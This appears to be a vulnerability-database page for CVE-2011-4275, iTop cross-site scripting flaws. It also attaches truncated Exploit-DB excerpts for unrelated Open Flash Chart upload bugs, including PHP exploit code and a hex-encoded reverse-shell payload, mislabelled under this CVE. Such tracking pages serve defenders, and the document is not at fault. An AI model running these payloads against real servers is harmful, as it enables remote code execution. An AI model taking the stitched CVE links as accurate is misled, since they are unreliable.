CVE-2011-4275
published 2011-11-26CVE-2011-4275: Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web…
PriorityP272medium4.3CVSS 2.0
AVNACMAuNCNIPAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.62%
73.1th percentile
Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| combodo | itop | — | — |
| combodo | itop | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →XSS via auth_user parameter in a suggest_pwd action to UI.php ↗
- →XSS via c[menu] parameter to UniversalSearch.php ↗
- →XSS via description parameter in a SearchFormToAdd_document_list action to UI.php ↗
- →XSS via category parameter in an errors action to audit.php ↗
- →XSS via suggest_pwd parameter to UI.php ↗
- ·Affected versions are iTop 1.1.181 and 1.2.0-RC-282 only; no operational exploit code or IOCs were present in the source documents for CVE-2011-4275. All other exploit documents (DOC 2–7) relate to unrelated CVEs and software. ↗
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h57m-vxj9-8gpv: Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1
ghsa_unreviewed·2022-05-14
CVE-2011-4275 [MEDIUM] CWE-79 GHSA-h57m-vxj9-8gpv: Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1
Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.
VulnCheck
combodo itop Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2011·CVSS 4.3
CVE-2011-4275 [MEDIUM] combodo itop Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
combodo itop Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Multiple cross-site scripting (XSS) vulnerabilities in iTop (aka IT Operations Portal) 1.1.181 and 1.2.0-RC-282 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted company name, (2) a crafted database server name, (3) a crafted CSV file, (4) a crafted copy-and-paste action, (5) the auth_user parameter in a suggest_pwd action to UI.php, (6) the c[menu] parameter to UniversalSearch.php, (7) the description parameter in a SearchFormToAdd_document_list action to UI.php, (8) the category parameter in an errors action to audit.php, or (9) the suggest_pwd parameter to UI.php.
Affected: combodo itop
Required Action: Apply remediations or mitigations per vendor instructio
No detection rules found.
Exploit-DB
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
exploitdb·2013-10-26
CVE-2011-4275 Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
Open Flash Chart 2 - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Open Flash Chart v2 Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in Open Flash
Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file
in order to upload and execute malicious PHP files.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Braeden Thomas', # Initial discovery + Piwik PoC
'Gjoko Krstic ', # OpenEMR PoC
'Halim Cruzito', # zonPHP PoC
'Brendan Coles ' # Metasploit
],
'References' =>
[
['BID', '37314'],
['CVE', '2009-4140'],
['OSVDB', '59051'],
['EDB', '10532']
],
'Payload' =>
{
'Space'
Exploit-DB
ZonPHP 2.25 - Remote Code Execution
exploitdb·2013-10-20
CVE-2011-4275 ZonPHP 2.25 - Remote Code Execution
ZonPHP 2.25 - Remote Code Execution
---
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7
# PoC:
";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",�
"Content-Type: text/plain");
$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);�
$shell
Exploit-DB
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
exploitdb·2013-04-22
CVE-2011-4275 Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
Joomla! Component com_civicrm 4.2.2 - Remote Code Injection
---
# Exploit Title: joomla component com_civicrm remode code injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org
exp.php -u http://target.com/ -f post.php
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");
$url = $options['u'];
$fi
Exploit-DB
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
exploitdb·2013-02-20
CVE-2011-4275 OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "OpenEMR PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
ofc_upload_image.php file from the openflashchart library, a malicious user can
upload a file to the tmp-upload-images directory without any authentication, which
results in arbitrary code execution. The module has been tested successfully on
OpenEMR 4.1.1 over Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Auth
Exploit-DB
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
exploitdb·2013-02-13
CVE-2011-4275 OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload
---
$errstr ($errno)\n";
die();
}
function r_shell($sc)
{
for($z = 0; $z Usage: php $argv[0] \n\n";
die();
}
$pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974".
"202830293b0d0a". "246970203d2027". "3132372e302e30".
"2e31273b0d0a24". "706f7274203d20". "313233343b0d0a".
"246368756e6b5f". "73697a65203d20". "313430303b0d0a".
"2477726974655f". "61203d206e756c". "6c3b2024657272".
"6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20".
"3d2027756e616d". "65202d613b2077". "3b2069643b202f".
"62696e2f736820". "2d69273b0d0a24".
"6461656d6f6e20". "3d20303b202464".
"65627567203d20". "303b0d0a696620".
"2866756e637469". "6f6e5f65786973".
"7473282770636e". "746c5f666f726b".
"272929207b0d0a". "24706964203d20".
"70636e746c5f66
Exploit-DB
Piwik Open Flash Chart - Remote Code Execution
exploitdb·2009-12-17
CVE-2011-4275 Piwik Open Flash Chart - Remote Code Execution
Piwik Open Flash Chart - Remote Code Execution
---
Bugtraq ID: 37314
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 14 2009 12:00AM
Updated: Dec 17 2009 06:03PM
Credit: Braeden Thomas
Vulnerable: Piwik Piwik 0.4.3
Piwik Piwik 0.4.2
Piwik Piwik 0.4.1
Piwik Piwik 0.4
Piwik Piwik 0.2.37
Piwik Piwik 0.2.36
Piwik Piwik 0.2.35
Open Web Analytics Open Web Analytics 1.2.0
Open Flash Chart Open Flash Chart 2.0
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/520632http://www.securityfocus.com/archive/1/520632/100/0/threadedhttp://www.tele-consulting.com/advisories/TC-SA-2011-02.txthttp://www.securityfocus.com/archive/1/520632http://www.securityfocus.com/archive/1/520632/100/0/threadedhttp://www.tele-consulting.com/advisories/TC-SA-2011-02.txt
2011-11-26
Published
Exploited in the wild